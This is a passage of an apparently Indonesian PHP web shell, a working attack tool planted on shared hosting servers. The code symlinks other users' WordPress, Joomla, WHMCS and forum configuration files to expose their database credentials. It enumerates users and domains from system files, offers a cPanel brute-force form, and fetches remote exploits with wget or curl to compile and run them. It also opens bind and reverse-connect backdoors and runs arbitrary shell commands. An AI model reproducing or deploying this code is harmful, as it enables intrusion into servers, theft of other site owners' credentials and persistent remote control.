3615 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3616 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3617 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3618 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3619 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3620 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3621 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3622 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3623 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3624 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3625 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3626 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3627 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3628 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3629 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3630 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3631 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3632 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3633 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3634 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3635 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3636 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3637 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3638 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3639 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3640 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3641 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3642 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3643 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3644 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3645 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3646 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3647 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3648 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3649 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3650 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3651 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3652 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3653 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3654 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3655 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3656 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3657 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3658 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3659 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3660 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3661 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3662 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3663 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3664 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3665 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3666 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3667 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3668 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3669 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3670 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3671 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3672 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3673 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3674 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3675 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3676 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3677 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3678 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3679 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3680 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3681 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3682 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3683 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3684 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3685 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3686 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3687 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3688 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3689 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3690 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3691 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3692 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3693 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3694 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3695 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3696 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3697 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3698 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3699 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3700 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3701 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3702 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3703 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3704 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3705 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3706 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3707 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3708 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3709 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3710 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3711 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3712 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3713 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3714 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3715 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3716 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3717 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3718 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3719 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3720 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3721 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3722 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3723 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3724 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3725 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3726 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3727 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3728 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3729 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3730 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3731 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3732 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3733 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3734 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3735 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3736 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3737 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3738 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3739 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3740 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3741 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3742 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3743 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3744 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3745 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3746 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3747 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3748 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3749 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3750 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3751 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3752 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3753 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3754 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3755 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3756 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3757 }
3758
3759 $d0mains = @file("/etc/named.conf");
3760
3761 if($d0mains)
3762 {
3763 mkdir($fn);
3764 chdir($fn);
3765
3766 foreach($d0mains as $d0main)
3767 {
3768 if(eregi("zone",$d0main))
3769 {
3770 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3771 flush();
3772
3773 if(strlen(trim($domains[1][0])) > 2)
3774 {
3775 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3776
3777 syml($user['name'],$domains[1][0]);
3778 }
3779 }
3780 }
3781 echo "<center><font color=lime size=3>Done</font></center>";
3782 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
3783 }
3784 else
3785 {
3786 mkdir($fn);
3787 chdir($fn);
3788 $temp = "";
3789 $val1 = 0;
3790 $val2 = 1000;
3791 for(;$val1 <= $val2;$val1++)
3792 {
3793 $uid = @posix_getpwuid($val1);
3794 if ($uid)
3795 $temp .= join(':',$uid)."\n";
3796 }
3797 echo '<br/>';
3798 $temp = trim($temp);
3799
3800 $file5 = fopen("test.txt","w");
3801 fputs($file5,$temp);
3802 fclose($file5);
3803
3804$htaccess =
3805'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
3806aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
3807biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
3808';
3809$file = fopen(".htaccess","w+");
3810$write = fwrite ($file ,base64_decode($htaccess));
3811
3812 $file = fopen("test.txt", "r") or exit("Unable to open file!");
3813 while(!feof($file))
3814 {
3815 $s = fgets($file);
3816 $matches = array();
3817 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3818 $matches = str_replace("home/","",$matches[1]);
3819 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3820 continue;
3821 syml($matches,$matches);
3822 }
3823 fclose($file);
3824 echo "</table>";
3825 unlink("test.txt");
3826 echo "<center><font color=lime size=3>Done</font></center>";
3827 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
3828 }
3829echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
3830exit;
3831}
3832?>
3833<form method="POST" target="_blank">
3834<input name="page" type="hidden" value="find">
3835 <table border=1>
3836 <body bgcolor="black" text="white"><br><br>
3837
3838 <center><b><font size="5" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
3839 <tr>
3840 <td>
3841 <strong>User :</strong>
3842 </td>
3843 <td>
3844 <strong><textarea cols="79" style="background:black;outline:none;color:white;" rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
3845 </td>
3846 <tr>
3847 <td>
3848 <strong>Pass :</strong>
3849 </td>
3850 <td>
3851 <strong><textarea cols="79" style="background:black;outline:none;color:white;" rows="10" name="passwords"></textarea></strong>
3852 </td>
3853 </tr>
3854 <tr>
3855 <td>
3856 <strong>Type :</strong>
3857 </td>
3858 <td>
3859 <span style="background:black;outline:none;color:white;"><strong>Simple : </strong> </span>
3860 <strong>
3861 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
3862 <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
3863 <strong>
3864 <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
3865 </strong>
3866 </span>
3867 <td style="background:black;outline:none;color:white;" >
3868 <strong><input class ='inputzbut' type="submit" value="START"></strong>
3869 </td>
3870 </tr>
3871 </table>
3872 <br>
3873 <table border=1>
3874 <tr>
3875 <td valign="top" style="background:black;outline:none;color:white;" >
3876 <strong>Get Config</strong>
3877 <br>
3878 <form method="POST" target="_blank">
3879 <strong>
3880<input name="mendapatkan" type="hidden" value="passwd" >
3881 </strong>
3882 <strong>Folder Name :</strong>
3883 <td>
3884
3885 <strong><input style="background:black;outline:none;color:white;" size="80" name="foldername" type="text"></strong>
3886 <td style="background:black;outline:none;color:white;" >
3887 <strong><input class ='inputzbut' type="submit" value="GO">
3888 </strong>
3889 </td>
3890 <tr>
3891</form>
3892<tr>
3893 <td style="background:black;outline:none;color:white;">
3894 <strong>Get Wordlist</strong>
3895<form method="POST" target="_blank">
3896 <strong>
3897<input name="pass" type="hidden" value="password">
3898 </strong>
3899 <strong>Url Config :</strong>
3900 <td>
3901
3902 <strong>
3903 <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
3904
3905 <td style="background:black;outline:none;color:white;"><strong><input class ='inputzbut' type="submit" value="GO">
3906 </strong>
3907 </td>
3908 <tr>
3909 <td style="background:black;outline:none;color:white;" colspan="6">
3910 <strong>Info Security</strong></td>
3911 </tr>
3912 <tr>
3913 <td style="background:black;outline:none;color:white;" style="width: 139px"><strong>Safe Mode</strong></td>
3914 <td style="background:black;outline:none;color:white;" colspan="5">
3915 <strong>
3916<?php
3917}
3918///
3919elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
3920 {
3921 ?>
3922 <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
3923 <br><br><br><center>
3924 <br>Hai? :)<br>
3925 Gw cuma mau nanya, kenapa si cuma shell aja di taro logger?
3926 gak suka? contact : kapaljetz666@hotmail.com :)
3927<br>fuck you<br>
3928 </div>
3929<?php
3930}
3931//////////////////////////////////////////////////////////////////////////////
3932elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
3933if(isset($_POST['uploadcomp'])){
3934 if(is_uploaded_file($_FILES['file']['tmp_name'])){
3935 $path = magicboom($_POST['path']);
3936 $fname = $_FILES['file']['name'];
3937 $tmp_name = $_FILES['file']['tmp_name'];
3938 $pindah = $path.$fname;
3939 $stat = @move_uploaded_file($tmp_name,$pindah);
3940 if ($stat) {
3941 $msg = "file uploaded to $pindah";
3942 }
3943 else $msg = "failed to upload $fname";
3944 }
3945 else $msg = "failed to upload $fname";
3946}
3947elseif(isset($_POST['uploadurl'])){
3948 $pilihan = trim($_POST['pilihan']);
3949 $wurl = trim($_POST['wurl']);
3950 $path = magicboom($_POST['path']);
3951 $namafile = download($pilihan,$wurl);
3952 $pindah = $path.$namafile;
3953 if(is_file($pindah)) {
3954 $msg = "file uploaded to $pindah";
3955 }
3956 else $msg = "failed to upload $namafile";
3957
3958}
3959?>
3960<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
3961<table class="tabnet" style="width:320px;padding:0 1px;">
3962<tr><th colspan="2">Upload from computer</th></tr>
3963<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
3964<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3965</tr>
3966</table></form>
3967<table class="tabnet" style="width:320px;padding:0 1px;">
3968<tr><th colspan="2">Upload from url</th></tr>
3969<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
3970<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
3971<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3972<tr><td><select size="1" class="inputz" name="pilihan">
3973<option value="wwget">wget</option>
3974<option value="wlynx">lynx</option>
3975<option value="wfread">fread</option>
3976<option value="wfetch">fetch</option>
3977<option value="wlinks">links</option>
3978<option value="wget">GET</option>
3979<option value="wcurl">curl</option>
3980</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
3981</tr>
3982</table>
3983<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3984<?php }
3985elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
3986
3987// bind connect with c
3988if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
3989 $port = trim($_POST['port']);
3990 $passwrd = trim($_POST['bind_pass']);
3991 tulis("bdc.c",$port_bind_bd_c);
3992 exe("gcc -o bdc bdc.c");
3993 exe("chmod 777 bdc");
3994 @unlink("bdc.c");
3995 exe("./bdc ".$port." ".$passwrd." &");
3996 $scan = exe("ps aux");
3997 if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
3998 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
3999}
4000// bind connect with perl
4001elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
4002 $port = trim($_POST['port']);
4003 $passwrd = trim($_POST['bind_pass']);
4004 tulis("bdp",$port_bind_bd_pl);
4005 exe("chmod 777 bdp");
4006 $p2=which("perl");
4007 exe($p2." bdp ".$port." &");
4008 $scan = exe("ps aux");
4009 if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
4010 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
4011}
4012// back connect with c
4013elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
4014 $ip = trim($_POST['ip']);
4015 $port = trim($_POST['backport']);
4016 tulis("bcc.c",$back_connect_c);
4017 exe("gcc -o bcc bcc.c");
4018 exe("chmod 777 bcc");
4019 @unlink("bcc.c");
4020 exe("./bcc ".$ip." ".$port." &");
4021 $msg = "Now script try connect to ".$ip." port ".$port." ...";
4022}
4023// back connect with perl
4024elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
4025 $ip = trim($_POST['ip']);
4026 $port = trim($_POST['backport']);
4027 tulis("bcp",$back_connect);
4028 exe("chmod +x bcp");
4029 $p2=which("perl");
4030 exe($p2." bcp ".$ip." ".$port." &");
4031 $msg = "Now script try connect to ".$ip." port ".$port." ...";
4032}
4033elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
4034{
4035 $pilihan = trim($_POST['pilihan']);
4036 $wurl = trim($_POST['wurl']);
4037 $namafile = download($pilihan,$wurl);
4038 if(is_file($namafile)) {
4039
4040 $msg = exe($wcmd);
4041 }
4042 else $msg = "error: file not found $namafile";
4043}
4044
4045?>
4046<table class="tabnet">
4047<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
4048<tr>
4049<td>
4050<table>
4051<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
4052<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
4053<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
4054<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
4055<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
4056</table>
4057</td>
4058<td>
4059<table>
4060<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
4061<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
4062<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
4063<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
4064<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
4065</table>
4066</td>
4067<td>
4068<table>
4069<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
4070<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
4071<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
4072</tr>
4073<tr><td><select size="1" class="inputz" name="pilihan">
4074<option value="wwget">wget</option>
4075<option value="wlynx">lynx</option>
4076<option value="wfread">fread</option>
4077<option value="wfetch">fetch</option>
4078<option value="wlinks">links</option>
4079<option value="wget">GET</option>
4080<option value="wcurl">curl</option>
4081</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
4082</table>
4083</td>
4084</tr>
4085</table>
4086<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
4087<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
4088<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
4089<table class="cmdbox">
4090<tr><td colspan="2">
4091<textarea class="output" readonly>
4092<?php
4093if(isset($_POST['submitcmd'])) {
4094 echo @exe($_POST['cmd']);
4095}
4096?>
4097</textarea>
4098<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
4099</table>
4100</form>
4101<?php }
4102else {
4103if(isset($_GET['delete']) && ($_GET['delete'] != "")){
4104 $file = $_GET['delete'];
4105 @unlink($file);
4106}
4107elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
4108 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
4109}
4110elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
4111 $path = $pwd.$_GET['mkdir'];
4112 @mkdir($path);
4113}
4114 $buff = showdir($pwd,$prompt);
4115 echo $buff;
4116}
4117?>
4118
4119<br>
4120<br>
4121<center>
4122<br><center><br><br><div class="info"># ALL SYSTEM JUST TOYS #</div><br>
4123<div class="jaya"><b>
4124</body>
4125</html>
4126</html>